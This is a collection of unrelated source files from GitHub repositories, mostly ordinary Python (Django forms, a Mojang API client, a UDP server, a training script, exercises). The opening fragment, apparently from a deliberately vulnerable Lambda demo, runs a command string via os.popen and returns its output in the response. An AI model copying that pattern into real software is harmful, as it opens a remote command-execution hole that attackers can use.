    with os.popen(command) as command_input:
        command_output = command_input.read()
    time.sleep(1)

    # Send message to SNS topic configured via environment.
    sns_arn = os.environ['SNS_ARN']
    sns_client = boto3.client('sns')
    sns_client.publish(
        TopicArn = sns_arn,
        Subject = 'Snyk Serverless Test',
        Message = "This is the information sent to the Lambda Function: " + data + " The output of the command: " +command+ " is: " + str(command_output)
    )
    return {
        "isBase64Encoded": "false",
        "statusCode": 200,
        "headers": {
            "Content-Type": "application/json"
        },
        "body": json.dumps({
            "Message " : data ,
            "Command Output" : command_output
        })
    }
| metalstormbass/Terraform-Cloud-Goof | lambda_code/main.py | main.py | py | 1,102 | python | en | code | 0 | github-code | 36 |
72184818663 | """
Given a string s which consists of lowercase or uppercase letters, return the length of the longest palindrome
that can be built with those letters.
Letters are case sensitive, for example, "Aa" is not considered a palindrome here.
"""
class Solution(object):
    def longestPalindrome(self, s):
        """Return the length of the longest palindrome buildable from the
        (case-sensitive) letters of s.

        Every letter contributes its largest even count; one leftover odd
        letter may sit in the middle.
        :type s: str
        :rtype: int
        """
        counts = {}
        for ch in s:
            counts[ch] = counts.get(ch, 0) + 1
        length = 0
        has_odd = False
        for c in counts.values():
            length += c - (c % 2)
            if c % 2:
                has_odd = True
        return length + 1 if has_odd else length
| Delacrua/LearningPython | LeetCode/409.longest_palindrome.py | 409.longest_palindrome.py | py | 662 | python | en | code | 0 | github-code | 36 |
25166244861 | import re
from django import forms
from crispy_forms.helper import FormHelper
from content.src.reg_expressions import RegExpressions
from content.models import Content, Video
from product.models import Product
class StyleMixin:
    """Mixin attaching a crispy-forms FormHelper for consistent form markup."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.helper = FormHelper()
class ValidateMixin:
    """Mixin adding validation to content-related forms (availability flags
    and paid-subscription consistency). Expects self.user to be set by the
    form's __init__."""
    def clean_is_paid_subs(self):
        """The paid-subscription flag is only allowed when the user has a
        Product row (i.e. has set a subscription price at registration)."""
        cleaned_data = self.cleaned_data.get('is_paid_subs')
        user_paid = Product.objects.filter(user=self.user)
        if cleaned_data and not user_paid:
            raise forms.ValidationError('Невозможно создать видео по подписке'
                                        ' так как вы не указали цену подписки'
                                        ' на пользователя при регистрации.'
                                        'Указать цену можно на странице '
                                        'редактирования пользователя')
        return cleaned_data
    def clean(self):
        """Cross-field validation: at least one availability flag must be
        set, and 'free' is mutually exclusive with every paid option."""
        cleaned_data = super().clean()
        is_free = self.cleaned_data.get('is_free')
        is_paid_subs = self.cleaned_data.get('is_paid_subs')
        is_src_subs = self.cleaned_data.get('is_src_subs')
        is_purchase = self.cleaned_data.get('is_purchase')
        if True not in [is_free, is_paid_subs, is_src_subs, is_purchase]:
            raise forms.ValidationError('Укажите минимум один параметр '
                                        'доступности видео: бесплатно, по '
                                        'подписке, по подписке на сервис, '
                                        'по разовой покупке')
        if is_free and is_paid_subs:
            raise forms.ValidationError('Видео не может быть одновременно '
                                        'бесплатным и по подписке на '
                                        'пользователя')
        if is_free and is_src_subs:
            raise forms.ValidationError('Видео не может быть одновременно '
                                        'бесплатным и по подписке на сервис')
        if is_free and is_purchase:
            raise forms.ValidationError('Видео не может быть одновременно '
                                        'бесплатным и доступным к покупке в'
                                        ' коллекцию')
        return cleaned_data
class ContentForm(StyleMixin, ValidateMixin, forms.ModelForm):
    """Form for creating a new Content instance. Field labels/help texts
    are user-facing Russian strings; availability flags are cross-validated
    by ValidateMixin."""
    title = forms.CharField(
        label="Название",
        help_text="Введите название записи. Ограничение 150 символов.",
        widget=forms.TextInput(
            attrs={
                'placeholder': "Лучшее название на планете..."},
        ),
        max_length=100,
        required=True,
    )
    description = forms.CharField(
        label="Описание",
        help_text="Введите название записи. Ограничение 150 символов.",
        widget=forms.Textarea(
            attrs={
                'placeholder': "Лучшее Описание на планете..."},
        ),
        required=True,
    )
    image = forms.ImageField(
        label="Изображение",
        help_text="Используйте изображение с соотношением сторон 16 на 9. "
                  "Данное изображение будет использовано как заставка к "
                  "видео . Если поле оставить пустым, то будет использовано "
                  "превью видео из YouTube.",
        required=False,
    )
    is_free = forms.BooleanField(
        label="Бесплатный контент",
        help_text="Установите галочку если контент будет доступен всем "
                  "пользователям без какой-либо оплаты."
                  "Если активно, то будет игнорироваться поле 'цена'",
        required=False,
    )
    start_publish = forms.DateTimeField(
        label="Время публикации",
        widget=forms.DateTimeInput(
            attrs={'type': 'datetime-local'},
        ),
        help_text="Укажите дату и время в которое автоматически будет "
                  "опубликована запись",
        required=False
    )
    is_publish = forms.BooleanField(
        label="Опубликовать сразу",
        help_text="Если активно, то запись будет опубликована "
                  "сразу после создания",
        required=False,
    )
    is_paid_subs = forms.BooleanField(
        label="Контент в подписке на пользователя",
        help_text='Установите галочку если контент будет доступен всем '
                  'пользователям оплатившим подписку на вас',
        required=False,
    )
    is_src_subs = forms.BooleanField(
        label="Контент в подписке на сервис",
        help_text='Установите галочку если контент будет доступен всем '
                  'пользователям оплатившим подписку на сервис. Вы будете'
                  'получать ежемесячное роялти в зависимости от просмотров',
        required=False,
    )
    is_purchase = forms.BooleanField(
        label="Контент доступен для покупки в коллекцию",
        help_text='Установите галочку если контент будет доступен для '
                  'единовременной покупки. Пользователь получит доступ к '
                  'контенту навсегда, а вы разовую единовременную оплату.'
                  'Если поле активно, необходимо казать цену для разовой'
                  ' покупки',
        required=False,
    )
    def __init__(self, *args, **kwargs):
        """Pop the request *user* from kwargs; ValidateMixin uses it for
        the subscription-price check."""
        self.user = kwargs.pop('user')
        super().__init__(*args, **kwargs)
    class Meta:
        model = Content
        fields = ('title', 'description', 'image', 'start_publish',
                  'is_publish', 'is_free', 'is_paid_subs', 'is_src_subs',
                  'is_purchase')
class ContentUpdateForm(StyleMixin, ValidateMixin, forms.ModelForm):
"""Класс описывающий форму для обновления экземпляра контента"""
title = forms.CharField(
label="Название",
help_text="Введите название записи. Ограничение 150 символов.",
widget=forms.TextInput(
attrs={
'placeholder': "Лучшее название на планете..."},
),
max_length=100,
required=True,
)
description = forms.CharField(
label="Описание",
help_text="Введите название записи. Ограничение 150 символов.",
widget=forms.TextInput(
attrs={
'placeholder': "Лучшее Описание на планете..."},
),
required=True,
)
image = forms.ImageField(
label="Изображение",
help_text="Используйте изображение с соотношением сторон 16 на 9. "
"Данное изображение будет использовано как заставка к "
"видео . Если поле оставить пустым, то будет использовано "
"превью видео из YouTube.",
required=False,
)
is_free = forms.BooleanField(
label="Бесплатный контент",
help_text="Установите галочку если контент будет доступен всем "
"пользователям без какой-либо оплаты."
"Если активно, то будет игнорироваться поле 'цена'",
required=False,
)
is_paid_subs = forms.BooleanField(
label="Контент в подписке на пользователя",
help_text='Установите галочку если контент будет доступен всем '
'пользователям оплатившим подписку на вас',
required=False,
)
is_src_subs = forms.BooleanField(
label="Контент в подписке на сервис",
help_text='Установите галочку если контент будет доступен всем '
'пользователям оплатившим подписку на сервис. Вы будете'
'получать ежемесячное роялти в зависимости от просмотров',
required=False,
)
is_purchase = forms.BooleanField(
label="Контент доступен для покупки в коллекцию",
help_text='Установите галочку если контент будет доступен для '
'единовременной покупки. Пользователь получит доступ к '
'контенту навсегда, а вы разовую единовременную оплату.'
'Если поле активно, необходимо казать цену для разовой'
' покупки',
required=False,
)
class Meta:
model = Content
fields = ('title', 'description', 'image',
'is_free', 'is_paid_subs', 'is_src_subs', 'is_purchase')
def __init__(self, *args, **kwargs):
"""Переопределение для фильтрации содержимого поля clients"""
self.user = kwargs.pop('user')
super().__init__(*args, **kwargs)
class VideoForm(StyleMixin, forms.ModelForm):
"""Форма описывающая видео"""
url = forms.URLField(
help_text="Ссылка на видео размещенное на видеохостинге YouTube."
"Ссылки на другой видеохостинг работать не будут. ",
widget=forms.TextInput(
attrs={
'placeholder': "https://www.youtube.com/..."},
),
max_length=150,
)
def save(self, commit=True):
"""Переопределение для добавления video_id во время сохранения"""
self.instance = super().save(commit=False)
self.instance.video_id = (
RegExpressions.get_video_id(self.cleaned_data['url']))
self.instance.save()
return self.instance
def clean_url(self):
"""Метод валидации поля платной подписки"""
cleaned_data = self.cleaned_data.get('url')
if cleaned_data:
if 'youtu' not in cleaned_data:
raise forms.ValidationError(
'Допускается использование видео только'
' с хостинга "YouTube"')
return cleaned_data
else:
raise forms.ValidationError(
'Кажется вы забыли указать ссылку на видео')
class Meta:
model = Video
fields = 'url',
| NewterraV/content_selling_platform | content/forms.py | forms.py | py | 13,160 | python | ru | code | 0 | github-code | 36 |
24438494857 | # Some functions for the Mojang API
# import requests
import requests
import datetime
import json
class MinecraftUUIDError(ValueError):
pass
class MinecraftUsernameError(ValueError):
pass
class Player:
# Essential variables
username = None
uuid = None
alias = None
# Vars to be used in called methods
names = None
def __init__(self, id, alias=None):
self.alias = alias
if len(id) > 16:
# It is a uuid, get the username as well
self.uuid = id
try:
self.username = get_player_from_uuid(id)['name']
except MinecraftUUIDError as err:
raise err
else:
# It is a username, get the uuid
self.username = id
try:
req = get_uuid_from_player(id)
self.uuid = req[0]['id']
self.username = req[0]['name']
except IndexError:
raise MinecraftUsernameError(f'{id} is not a valid username')
def name_history(self):
if self.names is None:
req_url = f'https://api.mojang.com/user/profiles/{self.uuid}/names'
req = requests.get(req_url)
res = req.json()
self.names = [(res[0]['name'], None)]
for name in res[1:]:
self.names.append((name['name'], name['changedToAt'] // 1000))
return self.names
def __str__(self):
return f'{self.username} {self.uuid}'
def get_uuid_from_player(names):
# If names is just a string of one name, convert it to a list
if type(names) == ''.__class__:
names = [names]
url = 'https://api.mojang.com/profiles/minecraft'
req = requests.post(url, json=names)
return req.json()
def get_player_from_uuid(uuid):
# Gets the player data for a uuid
url = f'https://sessionserver.mojang.com/session/minecraft/profile/{uuid}'
req = requests.get(url)
try:
return req.json()
except json.decoder.JSONDecodeError:
raise MinecraftUUIDError(f'{uuid} is not a valid UUID')
if __name__ == '__main__':
player = Player('8')
names = player.name_history()
for name in names:
try:
print(f'Switched to {name[0]} {datetime.datetime.fromtimestamp(name[1])}')
except TypeError as err:
print(f'Original name: {name[0]}')
| joshuaSmith2021/chamosbot-gassistant | mojang.py | mojang.py | py | 2,392 | python | en | code | 0 | github-code | 36 |
22076774319 | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 4 18:18:30 2023
@author: Pervin
"""
#mini uygulama
#if, for ve fonksiyonlari birlikte kullanmak
maaslar = [1000,2000,3000,4000,5000]
def maas_ust(x):
print(x*10/100 + x)
def maas_alt(x):
print(x*20/100 + x)
for i in maaslar:
if i >= 3000:
maas_ust(i)
else:
maas_alt(i) | pervincaliskan/Python | function_loops_example.py | function_loops_example.py | py | 366 | python | en | code | 1 | github-code | 36 |
74173801063 | from ctypes import CDLL, c_char_p, c_void_p, c_int, Structure, byref, c_byte
class SDL_Event(Structure):
_fields_ = [
('type', c_byte),
('padding', c_int * 1024),
]
class SDL(object):
SDL_INIT_AUDIO = 0x00000010
SDL_INIT_VIDEO = 0x00000020
SDL_OPENGL = 0x00000002
def __init__(self, width, height):
self.width = width
self.height = height
self.libSDL = CDLL('SDL')
self.SDL_Init = self.libSDL.SDL_Init
self.SDL_Init.argtypes = [c_int]
self.SDL_SetVideoMode = self.libSDL.SDL_SetVideoMode
self.SDL_SetVideoMode.argtypes = [c_int, c_int, c_int, c_int]
self.SDL_PollEvent = self.libSDL.SDL_PollEvent
self.SDL_PollEvent.argtypes = [c_void_p]
self.SDL_PollEvent.restype = c_int
self.SDL_Quit = self.libSDL.SDL_Quit
self.SDL_GetError = self.libSDL.SDL_GetError
self.SDL_GetError.restype = c_char_p
self.SDL_GL_SwapBuffers = self.libSDL.SDL_GL_SwapBuffers
if self.SDL_Init(self.SDL_INIT_VIDEO | self.SDL_INIT_AUDIO) == -1:
raise RuntimeError(SDL_GetError().decode('utf-8'))
if self.width != 0 and self.height != 0:
self.SDL_SetVideoMode(width, height, 0, self.SDL_OPENGL)
def update(self):
event = SDL_Event()
while self.SDL_PollEvent(byref(event)):
if event.type == 12: # SDL_QUIT
raise RuntimeError('Quit')
if self.width != 0 and self.height != 0:
self.SDL_GL_SwapBuffers()
def __del__(self):
try:
self.SDL_Quit()
except:
...
| supersmo/parley-who-vertigo | python/external/sdl.py | sdl.py | py | 1,644 | python | en | code | 1 | github-code | 36 |
20093789712 | # 序列:字符串 元祖 列表
# 成员操作符 🔗操作符 重复操作符 切片操作符
zodiac_name = ('猴鸡狗猪属牛虎兔龙蛇马羊')
constellation_name = (u'摩羯座', u'水瓶座', u'双鱼座', u'白羊座', u'金牛座', u'双子座',
u'巨蟹座', u'狮子座', u'处女座', u'天秤座', u'天蝎座', u'射手座')
# 元祖 不可变更
constellation_days = ((1, 20), (2, 19), (3, 21), (4, 21), (5, 21), (6, 22),
(7, 23), (8, 23), (9, 23), (10, 23), (11, 23), (12, 23))
# 元祖比较 元祖嵌套
# 列表 可变更
# filter lambda
# list函数
# len函数
(month, day) = (6, 26)
constellation_day = filter(lambda x: x <= (month, day), constellation_days)
constellation_len = len(list(constellation_day)) % 12
print(constellation_len)
print(constellation_name[constellation_len])
year = int(input('输入年份:'))
size = year % 12
print(zodiac_name[size])
# 列表操作
a_list = ['a', 'ab']
a_list.append('xyz')
print(a_list)
a_list.remove('a')
print(a_list)
# 字典
zodiac_num = {}
zodiac_num = {i: 0 for i in zodiac_name}
# for i in zodiac_name:
# # 更优雅地赋值
# zodiac_num[i] = 0
constellation_num = {}
constellation_num = {i: 0 for i in constellation_name}
# for i in constellation_name:
# constellation_num[i] = 0
while True:
year = int(input('输入年份:'))
month = int(input('输入月份:'))
day = int(input('输入日期:'))
n = 0
while constellation_days[n] < (month, day):
if month == 12 and day > 23:
break
n = n + 1
# print(constellation_name[n])
zodiac_num[zodiac_name[year % 12]] += 1
constellation_num[constellation_name[n]] += 1
for each_key in zodiac_num.keys():
print('生肖 %s 有 %d 个' % (each_key, zodiac_num[each_key]))
for each_key in constellation_num.keys():
print('星座 %s 有 %d 个' % (each_key, constellation_num[each_key]))
| mario2100/Spring_All | try/py_try/1_zodiac_constellation.py | 1_zodiac_constellation.py | py | 1,963 | python | en | code | 0 | github-code | 36 |
30079500269 | import QRTicketing
import cv2
def Decode(str):
a='ABCDEFGHIJKLMNOPQRSTUVWXYZ'
cipherstr=''
for i in str:
k=a.index(i)
cipherstr+=a[((k - 5)%26)]
return str
cap = cv2.VideoCapture(0)
detector = cv2.QRCodeDetector()
while True:
_, img = cap.read()
data, bbox, _ = detector.detectAndDecode(img)
if data:
a=data
break
cv2.imshow("image", img)
if cv2.waitKey(1) == ord("q"):
break
if(QRTicketing.main.verifyQR(a)):
QRTicketing.db_update([Decode(a[:"_"]),a["_"+1:]])
print("ValidQr")
else:
print("Invalid QR") | PreethiPreetz-30/Ticketless-Entry---QR | ScanTicket.py | ScanTicket.py | py | 593 | python | en | code | 0 | github-code | 36 |
7753689154 | total_notas = int(input("Ingrese la cantidad total de notas: "))
suma_notas = 0.0
# Solicitar las notas individuales y sumarlas
for i in range(total_notas):
nota = float(input("Ingrese la nota {}: ".format(i+1)))
suma_notas += nota
# Calcular el promedio
promedio = suma_notas / total_notas
# Mostrar el resultado
if promedio >= 3.0:
print("Aprobó")
else:
print("No aprobó")
| rubenalvarez98/Recuperalo | condicionales/condicionales5.py | condicionales5.py | py | 414 | python | es | code | 0 | github-code | 36 |
33008617060 | """ Python Class and Object """
class Parrot:
# class attribute
name = ""
age = 0
# create parrot1 object
parrot1 = Parrot()
parrot1.name = "Blu"
parrot1.age = 10
# create another object parrot2
parrot2 = Parrot()
parrot2.name = "Woo"
parrot2.age = 15
# access attributes
print(f"{parrot1.name} is {parrot1.age} years old")
print(f"{parrot2.name} is {parrot2.age} years old")
"""
Output:
Blu is 10 years old
Woo is 15 years old
"""
print()
""" Python Inheritance """
# base class
class Animal:
def eat(self):
print("I can eat!")
def sleep(self):
print("I can sleep!")
# derived class
class Dog(Animal):
def bark(self):
print("I can bark! Woof woof!!")
# create object of Dog class
dog1 = Dog()
# calling members of base class
dog1.eat()
dog1.sleep()
# calling members of derived class
dog1.bark()
"""
Output:
I can eat!
I can sleep!
I can bark! Woof woof!!
"""
print()
""" Python Encapsulation """
class Computer:
def __init__(self):
self.__maxprice = 900
def sell(self):
print("Selling Price: {}".format(self.__maxprice))
def setMaxPrice(self, price):
self.__maxprice = price
c = Computer()
c.sell()
# change the price
c.__maxprice = 1000
c.sell()
# using setter function
c.setMaxPrice(1000)
c.sell()
"""
Output:
Selling Price: 900
Selling Price: 900
Selling Price: 1000
"""
print()
""" Polymorphism """
class Polygon:
# method to render a shape
def render(self):
print("Rendering Polygon...")
class Square:
# renders square
def render(self):
print("Rendering Square...")
class Circle:
# renders circle
def render(self):
print("Rendering Circle...")
# create an object of Sqaure
s1 = Square()
s1.render()
# create an object of Circle
c1 = Circle()
c1.render()
"""
Output:
Rendering Square...
Rendering Circle...
"""
| Saiteja151/PYTHON_REPOS | Python/OOPS/OOPS/oops.py | oops.py | py | 1,971 | python | en | code | 0 | github-code | 36 |
15870462971 | import os
import sys
import time
import torch
import torch.nn.functional as F
from sklearn.metrics import mean_squared_error
from graphrepr.evaluate import test_model
from graphrepr.savingutils import save_configs, save_history, LoggerWrapper
from graphrepr.config import parse_model_config, parse_representation_config, parse_data_config
from graphrepr.config import utils_section, data_section, params_section, optimizer_section
from graphrepr.chemprop.args import ModelArgs
from graphrepr.chemprop.model import MoleculeModel
from graphrepr.chemprop.features import set_representation
from graphrepr.main_dmpnn_utils import load_data_chemprop, run_epoch, predict
# run: python main.py simple_nn.cfg esol.cfg simple_repr.cfg /home/abc/results
n_args = 1 + 4 # namefile, architecture_config, data_config, representation_config, main_saving_directory
NUM_WORKERS = 2
if __name__ == '__main__':
if len(sys.argv) != n_args:
print(f"Usage: {sys.argv[0]} architecture.cfg data.cfg representation.cfg main_saving_directory")
quit(1)
# set global saving subdir for this experiment and create it
# name of the experiment subdir is derived from the names of the configs
# config name should be: {unique_key}_{whatever}.{ext} ex. 2_best_model.cfg
basename = lambda x: os.path.basename(x).split('.')[0].split('_')[0]
dname = "_".join([basename(x) for x in [sys.argv[1], sys.argv[2], sys.argv[3]]])
saving_dir = os.path.join(sys.argv[4], dname)
try:
os.makedirs(saving_dir)
except FileExistsError:
pass
# setup logger (everything that goes through logger or stderr will be saved in a file and sent to stdout)
logger_wrapper = LoggerWrapper(saving_dir)
sys.stderr.write = logger_wrapper.log_errors
logger_wrapper.logger.info(f'Running {[basename(x) for x in [sys.argv[1], sys.argv[2], sys.argv[3]]]}')
# device selection
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Load configs
model_config = parse_model_config(sys.argv[1])
data_config = parse_data_config(sys.argv[2])
representation_config = parse_representation_config(sys.argv[3])
save_configs(sys.argv[1], sys.argv[2], sys.argv[3], saving_dir)
################
# # # DATA # # #
################
set_representation(**representation_config[utils_section])
# define train and validation data splits
if data_config[utils_section]['cv']:
trains = []
vals = []
for val_fold in data_config[data_section].values():
trains.append([fold for fold in data_config[data_section].values() if fold != val_fold])
vals.append([val_fold, ])
splits = list(zip(trains, vals))
else:
trains = [[data_config[data_section][key],] for key in data_config[data_section] if 'train' in key.lower()]
vals = [[data_config[data_section][key],] for key in data_config[data_section] if 'valid' in key.lower()]
splits = list(zip(trains, vals))
# load test
test_smiles, test_labels, test_loader = load_data_chemprop([data_config[utils_section]["test"], ],
data_config, model_config,
shuffle=False, num_workers=NUM_WORKERS)
#####################
# # # MAIN LOOP # # #
#####################
for fold_idx, (train_paths, validation_path) in enumerate(splits):
logger_wrapper.logger.info(f'Running fold {fold_idx+1}/{len(splits)}')
# subdirectory for this fold, file names
fold_subdirectory = os.path.join(saving_dir, f"fold{fold_idx+1}")
try:
os.makedirs(fold_subdirectory)
except FileExistsError:
pass
timestamp = time.strftime('%Y-%m-%d-%H-%M')
best_model_path = os.path.join(fold_subdirectory, f"{timestamp}-best_model_weights.pt")
# loading train and validation datasets
train_dataset, train_smiles, train_loader = load_data_chemprop(train_paths,
data_config, model_config,
shuffle=True, num_workers=NUM_WORKERS)
valid_dataset, valid_smiles, valid_loader = load_data_chemprop(validation_path,
data_config, model_config,
shuffle=False, num_workers=NUM_WORKERS)
# defining model, optimizer, scheduler, and the loss function
if "mse" == data_config[utils_section]['cost_function'].lower().strip():
loss_function = F.mse_loss
loss_function_valid = mean_squared_error # workaround cause we have np.arrays not torch.Tensors // FIXME?
loss_function_model_args = 'mse'
else:
raise NotImplementedError("Unknown loss function; only MSE is currently implemented")
modelArgs = ModelArgs(**model_config[params_section], device=device, loss_function=loss_function_model_args)
model = MoleculeModel(modelArgs).to(device)
logger_wrapper.logger.info(model)
logger_wrapper.logger.info(f"Number of conv layers: {model.encoder.encoder[0].depth}")
if "adam" == model_config[optimizer_section]['optimizer'].lower().strip():
optimizer = torch.optim.Adam(model.parameters(), lr=model_config[optimizer_section]['lr'])
else:
raise NotImplementedError("Unknown optimizer; only Adam is currently implemented")
scheduler = None # for easy checkup later
if model_config[optimizer_section]['scheduler'] > 0:
assert 0 < model_config[optimizer_section]['scheduler'] < 1, "scheduler value must be -1 (no scheduler) or between 0 and 1"
step_size = int(model_config[optimizer_section]['scheduler'] * model_config[optimizer_section]["n_epochs"])
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=step_size, gamma=0.1) # divide lr by ten after every step_size epochs
# actual training
train_loss = []
valid_loss = []
min_valid_loss = sys.maxsize
for epoch in range(model_config[optimizer_section]["n_epochs"]):
# train
cumulative_epoch_train_loss = run_epoch(model, loss_function, optimizer, train_loader, device)
# validate
true_ys, pred_ys = predict(model, valid_loader, device)
# scheduler
if scheduler is not None:
scheduler.step()
# remember stuff
epoch_valid_loss = loss_function_valid(pred_ys, true_ys)
train_loss.append(cumulative_epoch_train_loss / len(train_dataset))
valid_loss.append(epoch_valid_loss)
logger_wrapper.logger.info(f'Epoch: {epoch}, train loss: {train_loss[-1]}, valid loss: {epoch_valid_loss}')
if epoch_valid_loss < min_valid_loss:
logger_wrapper.logger.info("Saving model")
torch.save(model.state_dict(), best_model_path)
min_valid_loss = epoch_valid_loss
save_history(train_loss, valid_loss, fold_subdirectory)
# testing on the test set
# load the best version of the model, then repack data and run the test function
model.load_state_dict(torch.load(best_model_path))
model.eval() # set dropout and batch normalization layers to evaluation mode before running inference
# train gets new loader without shuffling so the order of smiles is OK # FIXME this is not ideal
train_dataset, train_smiles, train_loader = load_data_chemprop(train_paths,
data_config, model_config,
shuffle=False, num_workers=NUM_WORKERS)
data = ((train_loader, train_smiles), (valid_loader, valid_smiles), (test_loader, test_smiles))
test_model(model, data, device, fold_subdirectory,
calculate_parity=data_config[utils_section]["calculate_parity"],
calculate_rocauc=data_config[utils_section]["calculate_rocauc"],
predict_func=predict)
| gmum/graph-representations | scripts/main_dmpnn.py | main_dmpnn.py | py | 8,394 | python | en | code | 18 | github-code | 36 |
74837131945 | import unittest
from unittest.mock import Mock
from BookService import BookService
class TestBookService(unittest.TestCase):
def setUp(self) -> None:
self.book_repository = Mock()
self.author = "Лев Толстой"
self.list_books = [Mock(title="Анна Каренина"), Mock(title="Детство")]
def test_find_books_by_author(self):
self.book_repository.find_books_by_author.return_value = self.list_books
book_service = BookService(self.book_repository)
sort_books = book_service.find_books_by_author(self.author)
self.assertEqual(self.list_books, sort_books)
def test_find_book_by_id(self):
book_repository = Mock()
book_id = 1
expected_book = Mock(title="Азбука")
book_repository.find_book_by_id.return_value = expected_book
book_service = BookService(book_repository)
book = book_service.find_book_by_id(book_id)
self.assertEqual(expected_book, book)
| vit21513/unit_test | homework/hw_4/test_bookService.py | test_bookService.py | py | 1,002 | python | en | code | 0 | github-code | 36 |
8838127682 | """Models for Blogly."""
from flask_sqlalchemy import SQLAlchemy
import datetime
db = SQLAlchemy()
DEFAULT_IMAGE_URL = "https://cdn2.iconfinder.com/data/icons/avatars-99/62/avatar-370-456322-512.png"
def connect_db(app):
"""Connect to database."""
db.app = app
db.init_app(app)
class User(db.Model):
"""User class"""
__tablename__ = "users"
id = db.Column(db.Integer, primary_key = True, autoincrement = True)
first_name = db.Column(db.String(50), nullable = False)
last_name = db.Column(db.String(50), nullable = True)
image_url = db.Column(db.String, default = DEFAULT_IMAGE_URL)
posts = db.relationship("Post", backref="user", cascade="all, delete-orphan")
def __repr__(self):
return f"<User {self.first_name} {self.last_name} {self.image_url} >"
def get_full_name(self):
"""Get users full name."""
if self.last_name == None:
return self.first_name
else:
return f"{self.first_name} {self.last_name}"
class Post(db.Model):
"""Post class"""
__tablename__ = "posts"
id = db.Column(db.Integer, primary_key = True, autoincrement = True)
title = db.Column(db.String(50), nullable = False)
content = db.Column(db.String, nullable = True)
created_at = db.Column(db.DateTime, nullable = False, default=datetime.datetime.now)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'), nullable = False)
# posts_n_tags = db.relationship('PostTag', backref = 'post')
def __repr__(self):
return f"<Post {self.title} {self.content} {self.created_at} {self.user_id} >"
def friendly_date(self):
"""Show date in a user friendly format"""
return self.created_at.strftime("%a %b %-d %Y, %-I:%M %p")
class Tag(db.Model):
"""Tag class."""
__tablename__ = "tags"
id = db.Column(db.Integer, primary_key = True, autoincrement = True)
name = db.Column(db.String(50), nullable = False, unique = True)
# tags_n_posts = db.relationship('PostTag', backref = 'tag')
posts = db.relationship(
'Post',
secondary = 'posts_tags',
backref = "tags",
cascade="all, delete")
def __repr__(self):
return f"<Tag {self.id} {self.name}>"
class PostTag(db.Model):
"""PostTag class."""
__tablename__ = "posts_tags"
post_id = db.Column(db.Integer, db.ForeignKey("posts.id"), primary_key = True)
tag_id = db.Column(db.Integer, db.ForeignKey("tags.id"), primary_key = True)
def __repr__(self):
return f"<PostTag {self.post_id} {self.tag_id}>" | kabdrau/Blogly-application | models.py | models.py | py | 2,622 | python | en | code | 0 | github-code | 36 |
31065164595 |
from ..utils import Object
class UpdateMessageEdited(Object):
"""
A message was edited. Changes in the message content will come in a separate updateMessageContent
Attributes:
ID (:obj:`str`): ``UpdateMessageEdited``
Args:
chat_id (:obj:`int`):
Chat identifier
message_id (:obj:`int`):
Message identifier
edit_date (:obj:`int`):
Point in time (Unix timestamp) when the message was edited
reply_markup (:class:`telegram.api.types.ReplyMarkup`):
New message reply markup; may be null
Returns:
Update
Raises:
:class:`telegram.Error`
"""
ID = "updateMessageEdited"
def __init__(self, chat_id, message_id, edit_date, reply_markup, **kwargs):
self.chat_id = chat_id # int
self.message_id = message_id # int
self.edit_date = edit_date # int
self.reply_markup = reply_markup # ReplyMarkup
@staticmethod
def read(q: dict, *args) -> "UpdateMessageEdited":
chat_id = q.get('chat_id')
message_id = q.get('message_id')
edit_date = q.get('edit_date')
reply_markup = Object.read(q.get('reply_markup'))
return UpdateMessageEdited(chat_id, message_id, edit_date, reply_markup)
| iTeam-co/pytglib | pytglib/api/types/update_message_edited.py | update_message_edited.py | py | 1,307 | python | en | code | 20 | github-code | 36 |
11576039211 | from socket import *
from datetime import datetime
serverPort = 8080
serverSocket = socket(AF_INET, SOCK_DGRAM)
#atribui a porta ao socket criado
serverSocket.bind(('', serverPort))
print("The server is ready to receive")
while True:
#recebe a mensagem do cliente em bytes
message, clientAddress = serverSocket.recvfrom(2048)
print("mensagem recebida: ", message)
now = datetime.now()
msg = message.decode()
msg.upper()
msg = str(msg) + ' : ' + str(now)
message = str.encode(msg)
#envio tbm deve ser em bytes
serverSocket.sendto(message, clientAddress) | srpantoja/Redes_trabalhos | python/UDPServer.py | UDPServer.py | py | 593 | python | pt | code | 0 | github-code | 36 |
10638103617 | # -*- coding: utf-8 -*-
"""
Created on Wed Sep 14 23:01:14 2016
@author: Neo
parameter fitting, using Oort-Lindblad equation:
k*u_l^* = (S1*sin(l) - S2*cos(l)/r + B*cos(b) + A*cos(2l)*cos(b)
"""
import numpy as np
sin = np.sin
cos = np.cos
k = 4.7407
def ParFit(pmlon, err, l, b, r):
'''
pmls = pml*cos(b), mas/yr
r: kpc
'''
parS1 = sin(l)/r
parS2 = -cos(l)/r
parA = cos(2*l)*cos(b)
parB = cos(b)
wgt = np.diag(err**-2)
FT = np.vstack((parS1, parS2, parA, parB))
F = np.transpose(FT)
## a*x = y
a = np.dot(np.dot(FT, wgt), F)
y = np.dot(np.dot(FT, wgt), k*np.transpose(pmlon))
x = np.linalg.solve(a, y)
cov = np.linalg.inv(a)
sig = np.sqrt(cov.diagonal())
corrcoef = np.array([ cov[i,j]/sig[i]/sig[j] \
for j in range(len(x)) for i in range(len(x))])
corrcoef.resize((len(x), len(x)))
return x, sig, corrcoef
#def Elim(pmRAs,pmDEs, e_pmRA,e_pmDE, n):
# a = np.abs(pmRAs) - n*e_pmRA
# b = np.abs(pmDEs) - n*e_pmDE
# indice1 = np.where(a<0)
# indice2 = np.where(b<0)
# indice = np.intersect1d(indice1, indice2)
## pmRA = np.take(pmRA, indice)
## pmDE = np.take(pmDE, indice)
## e_pmRA = np.take(e_pmRA, indice)
## e_pmDE = np.take(e_pmDE, indice)
## RA = np.take(RA, indice)
## DE = np.take(DE, indice)
#
# return indice
#
#def loop(pmRA,pmDE,e_pmRA,e_pmDE,RA,DE, flog):
# w, sig, corrcoef = RotationFit(pmRA,pmDE,e_pmRA,e_pmDE,RA,DE)
#
# print>>flog, 'the orientation/spin are(mas/mas*yr-1):\n ',w
# print>>flog, ' sigma are(mas/mas*yr-1):\n', sig
# print>>flog, ' correlation coefficients are:\n', corrcoef
### Calculate the residuals
# wx = w[0]
# wy = w[1]
# wz = w[2]
#
# pmRAf = -sin(DE)*cos(RA)*wx-sin(DE)*sin(RA)*wy+cos(DE)*wz
# pmDEf = sin(RA)*wx-cos(RA)*wy
#
### residuals
# pmRAs = pmRAf - pmRA
# pmDEs = pmDEf - pmDE
#
### generate the new array after eliminating outliers
